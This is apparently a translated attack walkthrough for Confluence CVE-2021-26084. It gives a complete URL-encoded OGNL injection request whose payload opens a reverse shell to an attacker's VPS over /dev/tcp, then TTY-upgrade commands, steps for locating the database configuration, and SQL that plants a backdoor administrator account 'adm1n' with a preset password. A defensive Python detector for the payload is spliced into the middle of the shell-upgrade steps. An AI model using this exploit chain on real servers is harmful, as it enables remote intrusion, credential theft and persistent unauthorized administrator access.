Gaining access

Use the CVE to obtain access to the server.

CVE-2021-26084: Confluence remote code execution vulnerability

POST /pages/doenterpagevariables.action HTTP/1.1
Host: host
User-Agent: curl/8.9.1
Accept: */*
Content-Length: 1328
Content-Type: application/x-www-form-urlencoded
Connection: close

queryString=%5Cu0027%2B%7BClass%2EforName%28%5Cu0027javax%2Escript%2EScriptEngineManager%5Cu0027%29%2EnewInstance%28%29%2EgetEngineByName%28%5Cu0027JavaScript%5Cu0027%29%2E%5Cu0065val%28%5Cu0027var%20isWin%20%3D%20java%2Elang%2ESystem%2EgetProperty%28%5Cu0022os%2Ename%5Cu0022%29%2EtoLowerCase%28%29%2Econtains%28%5Cu0022win%5Cu0022%29%3B%20var%20cmd%20%3D%20new%20java%2Elang%2EString%28%5Cu0022bash%20%5Cu002Di%20%5Cu003E%5Cu0026%20%2Fdev%2Ftcp%2F192%2E168%2E1%2E1%2F8085%200%5Cu003E%5Cu00261%5Cu0022%29%3Bvar%20p%20%3D%20new%20java%2Elang%2EProcessBuilder%28%29%3B%20if%28isWin%29%7Bp%2Ecommand%28%5Cu0022cmd%2Eexe%5Cu0022%2C%20%5Cu0022%2Fc%5Cu0022%2C%20cmd%29%3B%20%7D%20else%7Bp%2Ecommand%28%5Cu0022bash%5Cu0022%2C%20%5Cu0022%2Dc%5Cu0022%2C%20cmd%29%3B%20%7Dp%2EredirectErrorStream%28true%29%3B%20var%20process%3D%20p%2Estart%28%29%3B%20var%20inputStreamReader%20%3D%20new%20java%2Eio%2EInputStreamReader%28process%2EgetInputStream%28%29%29%3B%20var%20bufferedReader%20%3D%20new%20java%2Eio%2EBufferedReader%28inputStreamReader%29%3B%20var%20line%20%3D%20%5Cu0022%5Cu0022%3B%20var%20output%20%3D%20%5Cu0022%5Cu0022%3B%20while%28%28line%20%3D%20bufferedReader%2EreadLine%28%29%29%20%21%3D%20null%29%7Boutput%20%3D%20output%20%2B%20line%20%2B%20java%2Elang%2ECharacter%2EtoString%2810%29%3B%20%7D%5Cu0027%29%7D%2B%5Cu0027

Change the Host header to the target; URL-decode the body and change the IP and port to those of your own VPS.
Upgrading the dumb shell to an interactive shell:
On the VPS, run exec bash.
Then enter:
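As an added example (not from the original post), a defender-side check that can be run over request bodies captured by a WAF or reverse proxy: it fully decodes the form body, including the \u escapes the payload depends on, and flags requests to the vulnerable action that carry the injection's markers. VULN_PATH, ognl_indicators and classify_request are names chosen here, and both sample bodies are constructed.

```python
import re
from urllib.parse import parse_qs

# Hypothetical names, assumptions of this added example rather than the post's own.
VULN_PATH = "/pages/doenterpagevariables.action"

# Injection markers, checked only after full decoding: the payload closes the OGNL
# string literal (' + {), then reflection-loads javax.script to run JavaScript.
OGNL_MARKERS = [
    ("string-breakout", re.compile(r"'\s*\+\s*\{")),
    ("Class.forName", re.compile(r"Class\.forName\(")),
    ("ScriptEngineManager", re.compile(r"ScriptEngineManager")),
    ("ProcessBuilder", re.compile(r"ProcessBuilder")),
    ("eval", re.compile(r"\.eval\(")),
]

def resolve_unicode_escapes(value: str) -> str:
    """Expand \\uXXXX: the exploit writes quotes as \\u0027 and even splits keywords
    (\\u0065val for eval), so matching before this step misses most markers."""
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), value)

def ognl_indicators(body: str) -> list:
    """Labels of the markers found in any field of the URL-decoded, unescaped body."""
    hits = []
    for values in parse_qs(body, keep_blank_values=True).values():
        for v in map(resolve_unicode_escapes, values):
            for label, rx in OGNL_MARKERS:
                if label not in hits and rx.search(v):
                    hits.append(label)
    return hits

def classify_request(method: str, path: str, body: str) -> str:
    """'exploit': POST to the vulnerable action with markers; 'suspicious': markers
    on any other request; 'ok': no markers."""
    hits = ognl_indicators(body)
    if not hits:
        return "ok"
    if method.upper() == "POST" and path.split("?", 1)[0] == VULN_PATH:
        return "exploit"
    return "suspicious"

# Constructed samples: the first mirrors the start of the injection pattern,
# the second an ordinary page-variables form submission.
SAMPLE_ATTACK = ("queryString=%5Cu0027%2B%7BClass%2EforName%28%5Cu0027javax%2Escript"
                 "%2EScriptEngineManager%5Cu0027%29%2E%5Cu0065val%28%5Cu0027x%5Cu0027%29"
                 "%7D%2B%5Cu0027")
SAMPLE_BENIGN = "queryString=release+notes+2021&pageId=12345"
```

A hit on the vulnerable action from a host that should never see it is worth an alert even before the full payload is reconstructed.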

python -c 'import pty; pty.spawn("/bin/bash")'

Press Ctrl-Z.
In the VPS terminal, enter:

stty raw -echo # turn off local echo
fg # the terminal will show nothing; that is expected

Finally, in the shell obtained on the target, enter:

export SHELL=bash && export TERM=xterm-256color && stty rows 31 columns 134 && reset

This gives a fully interactive shell.

Getting database access

The default path is: /var/atlassian/application-data/confluence/confluence.cfg.xml
If it is not there, use find / -name "confluence.cfg.xml"
Or use:

cat /opt/atlassian/confluence/confluence/WEB-INF/classes/confluence-init.properties | grep confluence.home

Getting Confluence admin access

First check which accounts are already in the confluence-administrators group:

select u.id, u.user_name, u.active from cwd_user u join cwd_membership m on u.id=m.child_user_id join cwd_group g on m.parent_id=g.id join cwd_directory d on d.id=g.directory_id where g.group_name = 'confluence-administrators' and d.directory_name='Confluence Internal Directory';

Insert an administrator account and password into the database (username adm1n, password admin); check that the id does not collide with an existing one.

insert into cwd_user(id, user_name, lower_user_name, active, created_date, updated_date, first_name, lower_first_name, last_name, lower_last_name, display_name, lower_display_name, email_address, lower_email_address, directory_id, credential) values (1212121, 'adm1n', 'adm1n', 'T', '2009-11-26 17:42:08', '2009-11-26 17:42:08', 'A. D.', 'a. d.', 'Ministrator', 'ministrator', 'A. D. Ministrator', 'a. d. ministrator', 'admin@example.com', 'admin@example.com', (select id from cwd_directory where directory_name='Confluence Internal Directory'), 'x61Ey612Kl2gpFL56FT9weDnpSo4AV8j8+qx2AuTHdRyY036xxzTTrw10Wq3+4qQyB+XURPWx1ONxp3Y3pB37A==');
insert into user_mapping values ('2c9681954172cf560000000000000001', 'adm1n', 'adm1n');

If the confluence-administrators and confluence-users groups do not exist, the groups must be inserted as well.

-- insert confluence-administrators
insert into cwd_group(id, group_name, lower_group_name, active, local, created_date, updated_date, description, group_type, directory_id)
values ( '888888','confluence-administrators','confluence-administrators','T','F','2011-03-21 12:20:29','2011-03-21 12:20:29',NULL,'GROUP',(select id from cwd_directory where directory_name='Confluence Internal Directory'));

-- insert confluence-users
insert into cwd_group(id, group_name, lower_group_name, active, local, created_date, updated_date, description, group_type, directory_id)
values ( '999999','confluence-users','confluence-users','T','F','2011-03-21 12:20:29','2011-03-21 12:20:29',NULL,'GROUP',(select id from cwd_directory where directory_name='Confluence Internal Directory'));

Finally, add adm1n to the groups (the ids must match the group ids used above).

-- 1
insert into cwd_membership (id, parent_id, child_user_id) values (888888, (select id from cwd_group where group_name='confluence-users' and directory_id=(select id from cwd_directory where directory_name='Confluence Internal Directory')), 1212121);
-- 2
insert into cwd_membership (id, parent_id, child_user_id) values (999999, (select id from cwd_group where group_name='confluence-administrators' and directory_id=(select id from cwd_directory where directory_name='Confluence Internal Directory')), 1212121);

Finally, log in to the system with adm1n/admin.